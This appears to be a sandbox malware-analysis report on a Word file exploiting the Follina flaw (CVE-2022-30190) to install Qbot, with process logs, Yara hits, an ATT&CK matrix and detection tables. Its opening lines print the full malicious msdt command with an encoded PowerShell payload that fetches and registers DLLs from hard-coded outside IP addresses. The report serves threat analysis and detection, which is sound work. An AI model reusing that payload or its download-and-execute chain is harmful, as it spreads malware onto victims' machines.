                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6719.tmp" "c:\Users\user\AppData\Local\Temp\jsmb0bcn\CSC77C6618222CF46A59B8ECBD8FB1D6F27.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AFF.tmp" "c:\Users\user\AppData\Local\Temp\hrcfnpcx\CSC21799C95C9C74436A487E343E485758E.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES51A8.tmp" "c:\Users\user\AppData\Local\Temp\0x1gvsr0\CSCC2AC50C55CDA45EB81AFC36471CF588E.TMP"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 33_2_007A36AA CreateNamedPipeA,33_2_007A36AA
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EA065 GetSystemTimeAsFileTime,26_2_049EA065
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 26_2_049EDF3D GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,26_2_049EDF3D
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                            Source: regsvr32.exe, 0000001A.00000003.477663223.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001B.00000003.481003923.000000000546F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000001C.00000003.489121900.0000000005D5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Qbot
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3420000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b60184.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.33f0184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.7a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.2c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.explorer.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.2c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b90000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.7a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.4660184.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.fa0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.4660184.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b90000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.49e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.33f0184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5310184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.explorer.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.explorer.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.7a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.fa0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5340000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.explorer.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.2c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3440000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3420000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.7a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5310184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5360000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.fa0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.2c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5340000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.fa0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5360000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b60184.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3440000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.496074932.0000000005340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000002.502484210.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.493470383.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000000.492939442.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.497271923.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.550245813.0000000003420000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.499646382.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.494431106.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.497169249.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.550560608.0000000003440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Yara detected CryptOne packer
                            Source: Yara matchFile source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Remote Access Functionality

                            barindex
                            Yara detected Qbot
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3420000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b60184.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.33f0184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.7a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.2c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.explorer.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.2c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b90000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.7a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.4660184.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.fa0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.4660184.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b90000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.49e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.33f0184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5310184.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.explorer.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.2.explorer.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.0.explorer.exe.7a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.fa0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5340000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 36.0.explorer.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.2c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3440000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3420000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 33.2.explorer.exe.7a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5310184.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5360000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.2.explorer.exe.fa0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.regsvr32.exe.2c30000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5340000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 34.0.explorer.exe.fa0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.regsvr32.exe.5360000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.regsvr32.exe.5b60184.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 41.2.regsvr32.exe.3440000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.496074932.0000000005340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000002.502484210.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000000.493470383.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000021.00000000.492939442.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000022.00000002.497271923.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.550245813.0000000003420000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.499646382.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.494431106.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000000.497169249.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.550560608.0000000003440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Yara detected CryptOne packer
                            Source: Yara matchFile source: 0000001A.00000002.494919958.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001C.00000002.500357016.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000029.00000002.549011824.00000000033F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.495963327.0000000005310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts1
                            Command and Scripting Interpreter                            		1
                            Scheduled Task/Job                            		412
                            Process Injection                            		11
                            Masquerading                            		1
                            Credential API Hooking                            		1
                            System Time Discovery                            		Remote Services1
                            Credential API Hooking                            		Exfiltration Over Other Network Medium1
                            Encrypted Channel                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		1
                            Scheduled Task/Job                            		1
                            Virtualization/Sandbox Evasion                            		LSASS Memory1
                            Query Registry                            		Remote Desktop Protocol1
                            Archive Collected Data                            		Exfiltration Over Bluetooth11
                            Ingress Tool Transfer                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts3
                            Native API                            		Logon Script (Windows)1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		Security Account Manager11
                            Security Software Discovery                            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts12
                            Exploitation for Client Execution                            		Logon Script (Mac)Logon Script (Mac)412
                            Process Injection                            		NTDS1
                            Virtualization/Sandbox Evasion                            		Distributed Component Object ModelInput CaptureScheduled Transfer21
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                            Obfuscated Files or Information                            		LSA Secrets2
                            Process Discovery                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable MediaLaunchdRc.commonRc.common1
                            DLL Side-Loading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                            Remote System Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                            File and Directory Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow16
                            System Information Discovery                            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 640879 Sample: doc782.docx Startdate: 07/06/2022 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->57 59 6 other signatures 2->59 8 regsvr32.exe 2->8         started        11 regsvr32.exe 2->11         started        13 regsvr32.exe 2->13         started        15 5 other processes 2->15 process3 dnsIp4 63 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->63 65 Injects code into the Windows Explorer (explorer.exe) 8->65 67 Writes to foreign memory regions 8->67 19 explorer.exe 8 1 8->19         started        69 Allocates memory in foreign processes 11->69 71 Maps a DLL or memory area into another process 11->71 22 explorer.exe 11->22         started        24 explorer.exe 13->24         started        51 185.234.247.119, 49752, 49758, 49781 INTERKONEKT-ASPL Russian Federation 15->51 39 C:\Users\user\Desktop\~$doc782.docx, data 15->39 dropped 41 C:\Users\user\AppData\Local\...\123[1].RES, HTML 15->41 dropped 43 C:\Users\user\AppData\Local\...\5F08FB8E.htm, HTML 15->43 dropped 45 4 other files (1 malicious) 15->45 dropped 26 msdt.exe 21 15->26         started        29 cvtres.exe 1 15->29         started        31 cvtres.exe 1 15->31         started        33 4 other processes 15->33 file5 signatures6 process7 file8 61 Uses schtasks.exe or at.exe to add and modify task schedules 19->61 35 schtasks.exe 19->35         started        47 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 26->47 dropped 49 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 26->49 dropped signatures9 process10 process11 37 conhost.exe 35->37         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            doc782.docx23%VirustotalBrowse
                            doc782.docx17%ReversingLabsDocument-Office.Exploit.CVE-2021-40444

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dll0%MetadefenderBrowse
                            C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\DiagPackage.dll0%ReversingLabs
                            C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
                            C:\Windows\Temp\SDIAG_1b5cafbf-8d40-4ed6-8603-5062d6c68751\en-US\DiagPackage.dll.mui0%ReversingLabs

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            36.0.explorer.exe.c30000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            36.2.explorer.exe.c30000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            34.0.explorer.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            27.2.regsvr32.exe.5360000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            26.2.regsvr32.exe.49e0000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            27.2.regsvr32.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                            26.2.regsvr32.exe.44f0000.1.unpack100%AviraHEUR/AGEN.1232827Download File
                            41.2.regsvr32.exe.2e40000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                            33.2.explorer.exe.7a0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            34.2.explorer.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
                            41.2.regsvr32.exe.3440000.3.unpack100%AviraHEUR/AGEN.1234562Download File
                            28.2.regsvr32.exe.4270000.1.unpack100%AviraHEUR/AGEN.1232827Download File
                            33.0.explorer.exe.7a0000.0.unpack100%AviraHEUR/AGEN.1234562Download File
